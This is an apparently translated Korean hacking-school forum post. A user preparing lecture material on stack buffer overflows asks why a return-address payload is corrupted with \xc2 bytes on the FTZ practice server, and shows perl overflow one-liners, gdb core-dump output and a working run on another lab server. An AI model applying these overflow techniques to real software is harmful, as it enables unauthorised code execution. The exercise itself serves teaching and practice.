Linux

   smile0909
   Hex code is not being inserted into the stack on the ftz server ㅠ

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_linux&no=4392


To prepare lecture material on a simple BOF, I am logged in with the guest account on the ftz server and testing.
Every option that can be set at compile time has been set. (-z execstack -fno-builtin -mpreferred-stack-boundary=2)

I am trying to use a BOF attack to put an address value (\x92\x83\x04\x08) into the return address part of the stack, but it isn't working..
When I took a core dump, a \xc2 value keeps getting inserted in between, like \xc2\x92\xc2\x83\xc2\x04\xc2\x08.

The char array buffer has size 4.
The output looks like this..

[guest@ftz test]$ perl -e 'print "a"x4,"b"x4,"\x92\x83\x04\x08"' | ./test
aaaabbbb혪혘
Segmentation fault (core dumped)
[guest@ftz test]$ gdb test core.9330
GNU gdb Red Hat Linux (5.3post-0.20021129.18rh)
Copyright 2003 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu"...
Core was generated by `./test'.
Program terminated with signal 11, Segmentation fault.
Cannot access memory at address 0x400160b0
#0  0x83c292c2 in ?? ()


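Did you perhaps deliberately set things up so that garbage values get inserted in between when hex code is put on the stack?
This is a method that definitely used to work... strange.. I think it definitely worked on the ftz server too, last year or the year before, so why does it suddenly not work? ㅠㅠ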

+
As shown below, it works fine on the BOF원정대 (BOF Expedition) server. (I created a separate guest account there.)
[guest@localhost test]$ perl -e 'print "a"x4,"b"x4,"\x38\x84\x04\x08"' | ./test
aaaabbbb8?
bof success!


  Hit : 2647     Date : 2015/01/23 04:38



    